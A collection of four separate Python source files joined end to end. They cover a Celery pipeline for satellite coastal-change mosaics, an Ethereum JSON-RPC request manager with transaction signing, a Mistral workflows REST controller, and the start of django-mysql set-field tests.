        | task_clean_up.si(task_id=task_id, task_model='CoastalChangeTask')).apply_async()
    return True
@task(name="coastal_change.processing_task", acks_late=True, base=BaseTask, bind=True)
def processing_task(self,
                    task_id=None,
                    geo_chunk_id=None,
                    time_chunk_id=None,
                    geographic_chunk=None,
                    time_chunk=None,
                    **parameters):
    """Process a parameter set and save the results to disk.

    Uses the geographic and time chunk id to identify output products.
    **params is updated with time and geographic ranges then used to load data.
    the task model holds the iterative property that signifies whether the algorithm
    is iterative or if all data needs to be loaded at once.

    Args:
        task_id, geo_chunk_id, time_chunk_id: identification for the main task and what chunk this is processing
        geographic_chunk: range of latitude and longitude to load - dict with keys latitude, longitude
        time_chunk: list of acquisition dates
        parameters: all required kwargs to load data.

    Returns:
        path to the output product, metadata dict, and a dict containing the geo/time ids
    """
    chunk_id = "_".join([str(geo_chunk_id), str(time_chunk_id)])
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    logger.info("Starting chunk: " + chunk_id)
    # A missing temp dir means the task was cancelled/cleaned up already.
    if not os.path.exists(task.get_temp_path()):
        return None
    # time_chunk holds [acquisitions in the starting year, acquisitions in
    # the comparison year].
    starting_year = _get_datetime_range_containing(*time_chunk[0])
    comparison_year = _get_datetime_range_containing(*time_chunk[1])
    dc = DataAccessApi(config=task.config_path)
    updated_params = parameters
    updated_params.update(geographic_chunk)

    def _compute_mosaic(time):
        """
        Loads data for some time range for the current geographic chunk,
        returning 3 objects - the mosaic, the task metadata, and the number of
        acquisitions that were in the retrieved data.
        """
        updated_params.update({'time': time})
        data = dc.get_dataset_by_extent(**updated_params)
        if data is None:
            logger.info("Empty chunk.")
            return None, None, None
        if 'time' not in data:
            logger.info("Invalid chunk.")
            return None, None, None
        clear_mask = task.satellite.get_clean_mask_func()(data)
        metadata = task.metadata_from_dataset({}, data, clear_mask, updated_params)
        return task.get_processing_method()(data, clean_mask=clear_mask, no_data=task.satellite.no_data_value), \
            metadata, len(data['time'])

    if check_cancel_task(self, task): return
    old_mosaic, old_metadata, num_scenes_old = _compute_mosaic(starting_year)
    if old_mosaic is None: return None
    task.scenes_processed = F('scenes_processed') + num_scenes_old
    # Avoid overwriting the task's status if it is cancelled.
    task.save(update_fields=['scenes_processed'])
    if check_cancel_task(self, task): return
    new_mosaic, new_metadata, num_scenes_new = _compute_mosaic(comparison_year)
    if new_mosaic is None: return None
    task.scenes_processed = F('scenes_processed') + num_scenes_new
    task.save(update_fields=['scenes_processed'])
    if check_cancel_task(self, task): return
    # Merge metadata from both years (later keys win on collision).
    metadata = {**old_metadata, **new_metadata}
    # Ensure data variables have the range of Landsat Collection 1 Level 2
    # since the color scales are tailored for that dataset.
    platform = task.satellite.platform
    collection = task.satellite.collection
    level = task.satellite.level
    mosaics = []
    for data in [old_mosaic, new_mosaic]:
        if collection != 'c1':
            old_dataset = data
            # Only the spectral bands are range-converted; all other data
            # variables are dropped for the conversion and re-attached after.
            drop_vars = [data_var for data_var in old_dataset.data_vars if data_var not in ['red', 'green', 'blue', 'nir', 'swir1', 'swir2']]
            data = \
                convert_range(data.drop_vars(drop_vars), from_platform=platform,
                              from_collection=collection, from_level=level,
                              to_platform=platform, to_collection='c1', to_level='l2')
            for drop_var in drop_vars:
                data[drop_var] = old_dataset[drop_var]
        mosaics.append(data)
    old_mosaic, new_mosaic = mosaics
    output_product = compute_coastal_change(old_mosaic, new_mosaic, no_data=task.satellite.no_data_value)
    if check_cancel_task(self, task): return
    path = os.path.join(task.get_temp_path(), chunk_id + ".nc")
    export_xarray_to_netcdf(output_product, path)
    dc.close()
    logger.info("Done with chunk: " + chunk_id)
    return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.recombine_geographic_chunks", base=BaseTask, bind=True)
def recombine_geographic_chunks(self, chunks, task_id=None):
    """Recombine processed data over the geographic indices

    For each geographic chunk process spawned by the main task, open the resulting dataset
    and combine it into a single dataset. Combine metadata as well, writing to disk.

    Args:
        chunks: list of the return from the processing_task function - path, metadata, and {chunk ids}

    Returns:
        path to the output product, metadata dict, and a dict containing the geo/time ids
    """
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    # chunks may be a single result rather than a list; normalize, then drop
    # empty (None) chunk results.
    total_chunks = [chunks] if not isinstance(chunks, list) else chunks
    total_chunks = [chunk for chunk in total_chunks if chunk is not None]
    if len(total_chunks) == 0:
        return None
    geo_chunk_id = total_chunks[0][2]['geo_chunk_id']
    time_chunk_id = total_chunks[0][2]['time_chunk_id']
    metadata = {}
    chunk_data = []
    for index, chunk in enumerate(total_chunks):
        metadata = task.combine_metadata(metadata, chunk[1])
        chunk_data.append(xr.open_dataset(chunk[0]))
    combined_data = combine_geographic_chunks(chunk_data)
    # For animated products, render this time slice to a PNG frame now so
    # create_output_products can assemble the gif later.
    if task.animated_product.animation_id != "none":
        path = os.path.join(task.get_temp_path(), "animation_{}.png".format(time_chunk_id))
        animated_data = mask_mosaic_with_coastlines(
            combined_data
        ) if task.animated_product.animation_id == "coastline_change" else mask_mosaic_with_coastal_change(
            combined_data)
        write_png_from_xr(
            path,
            animated_data,
            bands=['red', 'green', 'blue'],
            scale=task.satellite.get_scale(),
            no_data=task.satellite.no_data_value)
    path = os.path.join(task.get_temp_path(), "recombined_geo_{}.nc".format(time_chunk_id))
    export_xarray_to_netcdf(combined_data, path)
    logger.info("Done combining geographic chunks for time: " + str(time_chunk_id))
    return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.recombine_time_chunks", base=BaseTask, bind=True)
def recombine_time_chunks(self, chunks, task_id=None):
    """Recombine processed chunks over the time index.

    Open time chunked processed datasets and recombine them using the same function
    that was used to process them. This assumes an iterative algorithm - if it is not, then it will
    simply return the data again.

    Args:
        chunks: list of the return from the processing_task function - path, metadata, and {chunk ids}

    Returns:
        path to the output product, metadata dict, and a dict containing the geo/time ids
    """
    logger.info("RECOMBINE_TIME")
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    # Normalize to a list and drop empty (None) chunk results, matching the
    # behavior of recombine_geographic_chunks.
    total_chunks = chunks if isinstance(chunks, list) else [chunks]
    total_chunks = [chunk for chunk in total_chunks if chunk is not None]
    if len(total_chunks) == 0:
        return None
    # Sort on the time chunk id - earlier processed first as they're
    # incremented e.g. 0, 1, 2... Sorting on the output path string (as done
    # previously) orders lexicographically and breaks with ten or more time
    # chunks ("..._10.nc" < "..._2.nc").
    total_chunks = sorted(total_chunks, key=lambda chunk: chunk[2]['time_chunk_id'])
    geo_chunk_id = total_chunks[0][2]['geo_chunk_id']
    time_chunk_id = total_chunks[0][2]['time_chunk_id']
    metadata = {}
    for index, chunk in enumerate(total_chunks):
        metadata.update(chunk[1])
    # if we've computed an animation, only the last one will be needed for the next pass.
    # if there is no animation then this is fine anyways.
    path = total_chunks[-1][0]
    return path, metadata, {'geo_chunk_id': geo_chunk_id, 'time_chunk_id': time_chunk_id}
@task(name="coastal_change.create_output_products", base=BaseTask, bind=True)
def create_output_products(self, data, task_id=None):
    """Create the final output products for this algorithm.

    Open the final dataset and metadata and generate all remaining metadata.
    Convert and write the dataset to various formats and register all values in the task model
    Update status and exit.

    Args:
        data: tuple in the format of processing_task function - path, metadata, and {chunk ids}
    """
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    full_metadata = data[1]
    dataset = xr.open_dataset(data[0])
    # Register all output file paths on the task model.
    task.result_path = os.path.join(task.get_result_path(), "coastline_change.png")
    task.result_coastal_change_path = os.path.join(task.get_result_path(), "coastal_change.png")
    task.result_mosaic_path = os.path.join(task.get_result_path(), "mosaic.png")
    task.data_path = os.path.join(task.get_result_path(), "data_tif.tif")
    task.data_netcdf_path = os.path.join(task.get_result_path(), "data_netcdf.nc")
    task.animation_path = os.path.join(task.get_result_path(),
                                       "animation.gif") if task.animated_product.animation_id != 'none' else ""
    task.final_metadata_from_dataset(dataset)
    task.metadata_from_dict(full_metadata)
    bands = task.satellite.get_measurements() + ['coastal_change', 'coastline_old', 'coastline_new']
    png_bands = ['red', 'green', 'blue']
    export_xarray_to_netcdf(dataset, task.data_netcdf_path)
    write_geotiff_from_xr(task.data_path, dataset.astype('int32'), bands=bands, no_data=task.satellite.no_data_value)
    # Three PNGs: coastline overlay, coastal-change overlay, and plain mosaic.
    write_png_from_xr(
        task.result_path,
        mask_mosaic_with_coastlines(dataset),
        bands=png_bands,
        scale=task.satellite.get_scale(),
        no_data=task.satellite.no_data_value)
    write_png_from_xr(
        task.result_coastal_change_path,
        mask_mosaic_with_coastal_change(dataset),
        bands=png_bands,
        scale=task.satellite.get_scale(),
        no_data=task.satellite.no_data_value)
    write_png_from_xr(
        task.result_mosaic_path,
        dataset,
        bands=png_bands,
        scale=task.satellite.get_scale(),
        no_data=task.satellite.no_data_value)
    # Assemble the animation gif from the per-year frames written during
    # geographic recombination, skipping frames that were never produced.
    if task.animated_product.animation_id != "none":
        with imageio.get_writer(task.animation_path, mode='I', duration=1.0) as writer:
            for index in range(task.time_end - task.time_start):
                path = os.path.join(task.get_temp_path(), "animation_{}.png".format(index))
                if os.path.exists(path):
                    image = imageio.imread(path)
                    writer.append_data(image)
    logger.info("All products created.")
    # task.update_bounds_from_dataset(dataset)
    task.complete = True
    task.execution_end = datetime.now()
    task.update_status("OK", "All products have been generated. Your result will be loaded on the map.")
    return True
| |
import uuid
import json
import collections
import gevent
import rlp
from web3.utils.crypto import sha3
from web3.utils.string import force_text
from web3.utils.address import to_address
from web3.utils.encoding import (
to_decimal,
encode_hex,
decode_hex,
)
from web3.utils.transactions import (
is_bitcoin_available,
Transaction,
serialize_transaction,
add_signature_to_transaction,
)
class RequestManager(object):
    """Issues JSON-RPC requests through a pluggable provider.

    Supports synchronous (blocking) calls and asynchronous calls whose
    results are collected later by request id.
    """

    def __init__(self, provider):
        self.pending_requests = {}
        self.provider = provider

    def setProvider(self, provider):
        self.provider = provider

    def request_blocking(self, method, params):
        """
        Make a synchronous request using the provider
        """
        raw = self.provider.make_request(method, params)
        parsed = json.loads(force_text(raw))
        if "error" in parsed:
            raise ValueError(parsed["error"])
        return parsed['result']

    def request_async(self, method, params):
        """Spawn the request on a greenlet; return an id to collect it with."""
        request_id = uuid.uuid4()
        greenlet = gevent.spawn(self.request_blocking, method, params)
        self.pending_requests[request_id] = greenlet
        return request_id

    def receive_blocking(self, request_id, timeout=None):
        """Wait for and return the result of a previously issued async request."""
        try:
            pending = self.pending_requests.pop(request_id)
        except KeyError:
            raise KeyError("Request for id:{0} not found".format(request_id))
        if timeout is not None:
            timeout = gevent.Timeout(timeout).start()
        raw = pending.get(timeout=timeout)
        parsed = json.loads(raw)
        if "error" in parsed:
            raise ValueError(parsed["error"])
        return parsed['result']

    def receive_async(self, request_id, *args, **kwargs):
        raise NotImplementedError("Callback pattern not implemented")
class ManagerWrapper(object):
    """Transparent proxy around another request manager.

    Forwards every part of the manager API to the wrapped instance;
    subclasses override individual methods to intercept behaviour.
    """

    def __init__(self, wrapped_manager):
        self.wrapped_manager = wrapped_manager

    @property
    def provider(self):
        # Read-through to the wrapped manager's provider.
        return self.wrapped_manager.provider

    @property
    def pending_requests(self):
        return self.wrapped_manager.pending_requests

    def setProvider(self, provider):
        # Write-through: replace the wrapped manager's provider.
        self.wrapped_manager.provider = provider

    def request_blocking(self, *args, **kwargs):
        target = self.wrapped_manager
        return target.request_blocking(*args, **kwargs)

    def request_async(self, *args, **kwargs):
        target = self.wrapped_manager
        return target.request_async(*args, **kwargs)

    def receive_blocking(self, *args, **kwargs):
        target = self.wrapped_manager
        return target.receive_blocking(*args, **kwargs)

    def receive_async(self, *args, **kwargs):
        target = self.wrapped_manager
        return target.receive_async(*args, **kwargs)
class BaseSendRawTransactionMixin(ManagerWrapper):
    """Manager wrapper that converts `eth_sendTransaction` calls into locally
    signed `eth_sendRawTransaction` calls, tracking sent transaction hashes
    and nonces per sender address for nonce calculation."""

    # Per-address sets of sent txn hashes / used nonces; set in __init__.
    _known_transactions = None
    _known_nonces = None

    def __init__(self, *args, **kwargs):
        self._known_transactions = collections.defaultdict(set)
        self._known_nonces = collections.defaultdict(set)
        super(BaseSendRawTransactionMixin, self).__init__(*args, **kwargs)

    def _get_nonces_and_cleanup(self, addr, chain_nonce):
        # Yield the nonces of tracked transactions that are still at or ahead
        # of the chain's pending nonce, discarding stale (already mined)
        # entries as a side effect.
        all_txns = {
            txn_hash: self.request_blocking(
                'eth_getTransactionByHash',
                [txn_hash],
            ) for txn_hash in self._known_transactions[addr]
        }
        for txn_hash, txn in all_txns.items():
            if txn is None:
                # Node doesn't know this txn (dropped or not yet propagated);
                # keep tracking it but it contributes no nonce.
                continue
            txn_nonce = to_decimal(txn['nonce'])
            if txn_nonce < chain_nonce:
                # Obsolete - stop tracking it.
                self._known_transactions[addr].discard(txn_hash)
            else:
                yield txn_nonce
        # Same cleanup for explicitly recorded nonces.
        all_known_nonces = tuple(self._known_nonces[addr])
        for nonce in all_known_nonces:
            if nonce < chain_nonce:
                self._known_nonces[addr].discard(nonce)
            else:
                yield nonce

    def get_chain_nonce(self, addr):
        # 'pending' counts queued transactions as well as mined ones.
        chain_nonce = to_decimal(self.request_blocking(
            'eth_getTransactionCount',
            [addr, 'pending']
        ))
        return chain_nonce

    def get_nonce(self, addr):
        """Return the highest nonce known for *addr*, or -1 when the address
        has never transacted (so that callers' get_nonce(addr) + 1 == 0).

        NOTE(review): `chain_nonce` is a transaction *count* while the tracked
        values are used nonces; mixing them in max() then adding 1 in
        construct_full_transaction looks like it may skip a nonce when only
        the chain count is available - confirm against the node's semantics.
        """
        chain_nonce = self.get_chain_nonce(addr)
        tracked_txn_nonces = tuple(self._get_nonces_and_cleanup(addr, chain_nonce))
        nonce = max(0, chain_nonce, *tracked_txn_nonces)
        if nonce == 0 and not tracked_txn_nonces:
            return -1
        else:
            return nonce

    def get_transaction_signature(self, serialized_txn):
        # Subclass hook: produce a signature for the transaction.
        raise NotImplementedError("Must be implemented by subclasses")

    def sign_and_serialize_transaction(self, transaction):
        """Sign *transaction* and return the rlp-encoded signed transaction."""
        serialized_txn = serialize_transaction(transaction)
        # NOTE(review): despite the base-class parameter name, the
        # *unserialized* transaction dict is passed here; the concrete
        # implementations (e.g. DelegatedSigningManager) serialize it
        # themselves.
        signature = self.get_transaction_signature(transaction)
        signed_transaction = add_signature_to_transaction(
            serialized_txn,
            signature,
        )
        signed_and_serialized_txn = rlp.encode(signed_transaction, Transaction)
        return signed_and_serialized_txn

    def construct_full_transaction(self, base_transaction):
        """Fill in nonce/gasPrice/gas/value/to/data defaults without
        overriding any values the caller supplied."""
        txn_from = base_transaction['from']
        full_txn = dict(**base_transaction)
        full_txn.setdefault('nonce', self.get_nonce(txn_from) + 1)
        full_txn.setdefault('gasPrice', self.request_blocking(
            'eth_gasPrice', []
        ))
        full_txn.setdefault('gas', hex(90000))
        full_txn.setdefault('value', '0x0')
        full_txn.setdefault('to', '')
        full_txn.setdefault('data', '')
        return full_txn

    # RPC methods whose results are transaction hashes; sends through these
    # are recorded for later nonce bookkeeping.
    TXN_SENDING_METHODS = {
        'eth_sendTransaction',
        'eth_sendRawTransaction',
        'personal_signAndSendTransaction',
        'personal_sendTransaction',
    }

    def request_blocking(self, method, params):
        """Intercept `eth_sendTransaction` to sign locally and re-dispatch as
        `eth_sendRawTransaction`; record hashes/nonces of all sent txns."""
        if method == 'eth_sendTransaction':
            base_transaction = params[0]
            # create a fully signed transaction and send through the
            # `eth_sendRawTransaction` endpoint instead.
            full_transaction = self.construct_full_transaction(base_transaction)
            raw_transaction_bytes = self.sign_and_serialize_transaction(
                full_transaction,
            )
            raw_transaction_bytes_as_hex = encode_hex(raw_transaction_bytes)
            # Re-enter this method so the raw send is recorded below.
            return self.request_blocking(
                'eth_sendRawTransaction', [raw_transaction_bytes_as_hex],
            )
        result = super(BaseSendRawTransactionMixin, self).request_blocking(
            method, params,
        )
        if method in self.TXN_SENDING_METHODS:
            if method == 'eth_sendRawTransaction':
                # Raw sends: recover sender and nonce from the rlp payload.
                txn = rlp.decode(decode_hex(params[0]), Transaction)
                self._known_transactions[to_address(txn.sender)].add(result)
                self._known_nonces[to_address(txn.sender)].add(txn.nonce)
            else:
                # Dict-based sends: the nonce is only known if supplied.
                txn = params[0]
                self._known_transactions[to_address(txn['from'])].add(result)
                if 'nonce' in txn:
                    self._known_nonces[to_address(txn['from'])].add(
                        to_decimal(txn['nonce'])
                    )
        return result
class DelegatedSigningManager(BaseSendRawTransactionMixin):
    """Signs transactions by delegating hashing and signing to a second
    RPC manager (``signing_manager``) that holds the account keys.
    """
    def __init__(self, *args, **kwargs):
        # The delegate node that performs `web3_sha3` and `eth_sign`.
        self.signing_manager = kwargs.pop('signing_manager')
        super(DelegatedSigningManager, self).__init__(*args, **kwargs)
    def get_chain_nonce(self, addr):
        # Both the signing node and the wrapped node may have pending
        # transactions; trust whichever reports the higher count.
        signer_nonce = to_decimal(self.signing_manager.request_blocking(
            'eth_getTransactionCount',
            [addr, 'pending']
        ))
        # NOTE(review): ``self.wrapped_manager`` is never assigned in this
        # class — presumably set by a base/wrapper class; confirm.
        wrapped_nonce = to_decimal(self.wrapped_manager.request_blocking(
            'eth_getTransactionCount',
            [addr, 'pending']
        ))
        return max(signer_nonce, wrapped_nonce)
    def get_transaction_signature(self, transaction):
        """Hash the serialized transaction remotely, then have the signing
        node ``eth_sign`` the hash with the key for ``transaction['from']``.
        """
        serialized_txn = serialize_transaction(transaction)
        hash_to_sign = self.signing_manager.request_blocking(
            'web3_sha3', [encode_hex(serialized_txn)],
        )
        signature_hex = self.signing_manager.request_blocking(
            'eth_sign',
            [
                transaction['from'],
                hash_to_sign,
            ],
        )
        signature = decode_hex(signature_hex)
        return signature
class PrivateKeySigningManager(BaseSendRawTransactionMixin):
    """Signs transactions locally with private keys registered on this
    manager.  Requires the optional ``bitcoin`` and ``secp256k1`` packages.
    """

    def __init__(self, *args, **kwargs):
        if not is_bitcoin_available():
            raise ImportError(
                "In order to use the `PrivateKeySigningManager` the "
                "`bitcoin` and `secp256k1` packages must be installed."
            )
        # Mapping of hex address -> private key.
        self.keys = kwargs.pop('keys', {})
        super(PrivateKeySigningManager, self).__init__(*args, **kwargs)

    def register_private_key(self, key):
        """Derive the account address for ``key`` and remember the key."""
        from bitcoin import privtopub
        # keccak over the uncompressed public key (skipping the 0x04
        # prefix byte), keeping the low 20 bytes (40 hex chars).
        derived_address = to_address(sha3(privtopub(key)[1:])[-40:])
        self.keys[derived_address] = key

    def sign_and_serialize_transaction(self, transaction):
        """Sign ``transaction`` with the registered key for its sender and
        return the RLP-encoded signed transaction bytes."""
        sender = to_address(transaction['from'])
        if sender not in self.keys:
            raise KeyError("No signing key registered for from address: {0}".format(sender))
        unsigned = Transaction(
            nonce=to_decimal(transaction['nonce']),
            gasprice=to_decimal(transaction['gasPrice']),
            startgas=to_decimal(transaction['gas']),
            to=transaction['to'],
            value=to_decimal(transaction['value']),
            data=decode_hex(transaction['data']),
        )
        unsigned.sign(self.keys[sender])
        # Sanity check: the recovered signer must match the requested one.
        assert to_address(unsigned.sender) == sender
        return rlp.encode(unsigned, Transaction)
| |
# Copyright 2013 - Mirantis, Inc.
# Copyright 2015 - StackStorm, Inc.
# Copyright 2015 Huawei Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_log import log as logging
from oslo_utils import uuidutils
import pecan
from pecan import hooks
from pecan import rest
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from mistral.api import access_control as acl
from mistral.api.controllers.v2 import member
from mistral.api.controllers.v2 import resources
from mistral.api.controllers.v2 import types
from mistral.api.controllers.v2 import validation
from mistral.api.hooks import content_type as ct_hook
from mistral import context
from mistral.db.v2 import api as db_api
from mistral import exceptions as exc
from mistral.lang import parser as spec_parser
from mistral.services import workflows
from mistral.utils import filter_utils
from mistral.utils import rest_utils
LOG = logging.getLogger(__name__)
class WorkflowsController(rest.RestController, hooks.HookController):
    """REST controller for the v2 ``/workflows`` endpoint (CRUD, listing
    and routing to the resource-sharing sub-controller)."""
    # TODO(nmakhotkin): Have a discussion with pecan/WSME folks in order
    # to have requests and response of different content types. Then
    # delete ContentTypeHook.
    __hooks__ = [ct_hook.ContentTypeHook("application/json", ['POST', 'PUT'])]
    # Sub-controller that validates workflow definitions without saving.
    validate = validation.SpecValidationController(
        spec_parser.get_workflow_list_spec_from_yaml)
    @pecan.expose()
    def _lookup(self, identifier, sub_resource, *remainder):
        """Route ``/workflows/<uuid>/members`` to the MembersController."""
        LOG.debug(
            "Lookup subcontrollers of WorkflowsController, "
            "sub_resource: %s, remainder: %s.",
            sub_resource,
            remainder
        )
        if sub_resource == 'members':
            # Sharing only works with UUIDs; names are ambiguous across
            # projects/namespaces.
            if not uuidutils.is_uuid_like(identifier):
                raise exc.WorkflowException(
                    "Only support UUID as resource identifier in resource "
                    "sharing feature."
                )
            # We don't check workflow's existence here, since a user may query
            # members of a workflow, which doesn't belong to him/her.
            return member.MembersController('workflow', identifier), remainder
        return super(WorkflowsController, self)._lookup(
            identifier,
            sub_resource,
            *remainder
        )
    @rest_utils.wrap_wsme_controller_exception
    @wsme_pecan.wsexpose(resources.Workflow, wtypes.text, wtypes.text)
    def get(self, identifier, namespace=''):
        """Return the named workflow.
        :param identifier: Name or UUID of the workflow to retrieve.
        :param namespace: Optional. Namespace of the workflow to retrieve.
        """
        acl.enforce('workflows:get', context.ctx())
        LOG.debug("Fetch workflow [identifier=%s]", identifier)
        # Use retries to prevent possible failures.
        r = rest_utils.create_db_retry_object()
        db_model = r.call(
            db_api.get_workflow_definition,
            identifier,
            namespace=namespace
        )
        return resources.Workflow.from_db_model(db_model)
    @rest_utils.wrap_pecan_controller_exception
    @pecan.expose(content_type="text/plain")
    def put(self, identifier=None, namespace=''):
        """Update one or more workflows.
        :param identifier: Optional. If provided, it's UUID of a workflow.
            Only one workflow can be updated with identifier param.
        :param namespace: Optional. If provided int's the namespace of the
                          workflow/workflows. currently namespace cannot be
                          changed.
        The text is allowed to have definitions of multiple workflows. In this
        case they all will be updated.
        """
        acl.enforce('workflows:update', context.ctx())
        # Raw workflow YAML arrives as the request body (see ContentTypeHook).
        definition = pecan.request.text
        scope = pecan.request.GET.get('scope', 'private')
        if scope not in resources.SCOPE_TYPES.values:
            raise exc.InvalidModelException(
                "Scope must be one of the following: %s; actual: "
                "%s" % (resources.SCOPE_TYPES.values, scope)
            )
        LOG.debug("Update workflow(s) [definition=%s]", definition)
        db_wfs = workflows.update_workflows(
            definition,
            scope=scope,
            identifier=identifier,
            namespace=namespace
        )
        workflow_list = [
            resources.Workflow.from_db_model(db_wf) for db_wf in db_wfs
        ]
        # Single-workflow update returns the object itself; otherwise a list.
        return (workflow_list[0].to_json() if identifier
                else resources.Workflows(workflows=workflow_list).to_json())
    @rest_utils.wrap_pecan_controller_exception
    @pecan.expose(content_type="text/plain")
    def post(self, namespace=''):
        """Create a new workflow.
        NOTE: The text is allowed to have definitions
            of multiple workflows. In this case they all will be created.
        :param namespace: Optional. The namespace to create the workflow
            in. Workflows with the same name can be added to a given
            project if are in two different namespaces.
        """
        acl.enforce('workflows:create', context.ctx())
        definition = pecan.request.text
        scope = pecan.request.GET.get('scope', 'private')
        # 201 Created on success; validation errors below override this.
        pecan.response.status = 201
        if scope not in resources.SCOPE_TYPES.values:
            raise exc.InvalidModelException(
                "Scope must be one of the following: %s; actual: "
                "%s" % (resources.SCOPE_TYPES.values, scope)
            )
        LOG.debug("Create workflow(s) [definition=%s]", definition)
        db_wfs = workflows.create_workflows(
            definition,
            scope=scope,
            namespace=namespace
        )
        workflow_list = [
            resources.Workflow.from_db_model(db_wf) for db_wf in db_wfs
        ]
        return resources.Workflows(workflows=workflow_list).to_json()
    @rest_utils.wrap_wsme_controller_exception
    @wsme_pecan.wsexpose(None, wtypes.text, wtypes.text, status_code=204)
    def delete(self, identifier, namespace=''):
        """Delete a workflow.
        :param identifier: Name or ID of workflow to delete.
        :param namespace: Optional. Namespace of the workflow to delete.
        """
        acl.enforce('workflows:delete', context.ctx())
        LOG.debug("Delete workflow [identifier=%s, namespace=%s]",
                  identifier, namespace)
        with db_api.transaction():
            db_api.delete_workflow_definition(identifier, namespace)
    @rest_utils.wrap_wsme_controller_exception
    @wsme_pecan.wsexpose(resources.Workflows, types.uuid, int,
                         types.uniquelist, types.list, types.uniquelist,
                         wtypes.text, wtypes.text, wtypes.text, wtypes.text,
                         resources.SCOPE_TYPES, types.uuid, wtypes.text,
                         wtypes.text, bool, wtypes.text)
    def get_all(self, marker=None, limit=None, sort_keys='created_at',
                sort_dirs='asc', fields='', name=None, input=None,
                definition=None, tags=None, scope=None,
                project_id=None, created_at=None, updated_at=None,
                all_projects=False, namespace=None):
        """Return a list of workflows.
        :param marker: Optional. Pagination marker for large data sets.
        :param limit: Optional. Maximum number of resources to return in a
                      single result. Default value is None for backward
                      compatibility.
        :param sort_keys: Optional. Columns to sort results by.
                          Default: created_at.
        :param sort_dirs: Optional. Directions to sort corresponding to
                          sort_keys, "asc" or "desc" can be chosen.
                          Default: asc.
        :param fields: Optional. A specified list of fields of the resource to
                       be returned. 'id' will be included automatically in
                       fields if it's provided, since it will be used when
                       constructing 'next' link.
        :param name: Optional. Keep only resources with a specific name.
        :param namespace: Optional. Keep only resources with a specific
                          namespace
        :param input: Optional. Keep only resources with a specific input.
        :param definition: Optional. Keep only resources with a specific
                           definition.
        :param tags: Optional. Keep only resources containing specific tags.
        :param scope: Optional. Keep only resources with a specific scope.
        :param project_id: Optional. The same as the requester project_id
                           or different if the scope is public.
        :param created_at: Optional. Keep only resources created at a specific
                           time and date.
        :param updated_at: Optional. Keep only resources with specific latest
                           update time and date.
        :param all_projects: Optional. Get resources of all projects.
        """
        acl.enforce('workflows:list', context.ctx())
        # Listing across projects requires an extra policy check.
        if all_projects:
            acl.enforce('workflows:list:all_projects', context.ctx())
        filters = filter_utils.create_filters_from_request_params(
            created_at=created_at,
            name=name,
            scope=scope,
            tags=tags,
            updated_at=updated_at,
            input=input,
            definition=definition,
            project_id=project_id,
            namespace=namespace
        )
        LOG.debug("Fetch workflows. marker=%s, limit=%s, sort_keys=%s, "
                  "sort_dirs=%s, fields=%s, filters=%s, all_projects=%s",
                  marker, limit, sort_keys, sort_dirs, fields, filters,
                  all_projects)
        return rest_utils.get_all(
            resources.Workflows,
            resources.Workflow,
            db_api.get_workflow_definitions,
            db_api.get_workflow_definition_by_id,
            marker=marker,
            limit=limit,
            sort_keys=sort_keys,
            sort_dirs=sort_dirs,
            fields=fields,
            all_projects=all_projects,
            **filters
        )
| |
from __future__ import annotations
import json
import re
import pytest
from django import forms
from django.core import exceptions, serializers
from django.core.management import call_command
from django.db import connection, models
from django.db.migrations.writer import MigrationWriter
from django.db.models import Q, Value
from django.test import SimpleTestCase, TestCase, TransactionTestCase, override_settings
from django.test.utils import isolate_apps
from django_mysql.forms import SimpleSetField
from django_mysql.models import SetCharField, SetF
from django_mysql.test.utils import override_mysql_variables
from tests.testapp.models import CharSetDefaultModel, CharSetModel, IntSetModel
class TestSaveLoad(TestCase):
    """Round-trip persistence and lookup behaviour of set fields
    (CharSetModel / IntSetModel / CharSetDefaultModel)."""
    def test_char_easy(self):
        # Set equality is order-independent; values survive save/reload.
        s = CharSetModel.objects.create(field={"big", "comfy"})
        assert s.field == {"comfy", "big"}
        s = CharSetModel.objects.get(id=s.id)
        assert s.field == {"comfy", "big"}
        s.field.add("round")
        s.save()
        assert s.field == {"comfy", "big", "round"}
        s = CharSetModel.objects.get(id=s.id)
        assert s.field == {"comfy", "big", "round"}
    def test_char_string_direct(self):
        # A raw comma-separated string is parsed into a set on reload.
        s = CharSetModel.objects.create(field="big,bad")
        s = CharSetModel.objects.get(id=s.id)
        assert s.field == {"big", "bad"}
    def test_is_a_set_immediately(self):
        # An unsaved instance already exposes a mutable (empty) set.
        s = CharSetModel()
        assert s.field == set()
        s.field.add("bold")
        s.field.add("brave")
        s.save()
        assert s.field == {"bold", "brave"}
        s = CharSetModel.objects.get(id=s.id)
        assert s.field == {"bold", "brave"}
    def test_empty(self):
        s = CharSetModel.objects.create()
        assert s.field == set()
        s = CharSetModel.objects.get(id=s.id)
        assert s.field == set()
    def test_char_cant_create_sets_with_empty_string(self):
        # Empty string members are rejected — they can't be represented in
        # the comma-separated storage format.
        with pytest.raises(ValueError):
            CharSetModel.objects.create(field={""})
    def test_char_cant_create_sets_with_commas(self):
        # Commas are the storage separator, so members may not contain them.
        with pytest.raises(ValueError):
            CharSetModel.objects.create(field={"co,mma", "contained"})
    def test_char_basic_lookup(self):
        # An empty set is stored as the empty string.
        mymodel = CharSetModel.objects.create()
        empty = CharSetModel.objects.filter(field="")
        assert empty.count() == 1
        assert empty[0] == mymodel
        mymodel.delete()
        assert empty.count() == 0
    def test_char_lookup_contains(self):
        self.check_char_lookup("contains")
    def test_char_lookup_icontains(self):
        self.check_char_lookup("icontains")
    def check_char_lookup(self, lookup):
        """Shared assertions for the contains/icontains membership lookups."""
        lname = "field__" + lookup
        mymodel = CharSetModel.objects.create(field={"mouldy", "rotten"})
        mouldy = CharSetModel.objects.filter(**{lname: "mouldy"})
        assert mouldy.count() == 1
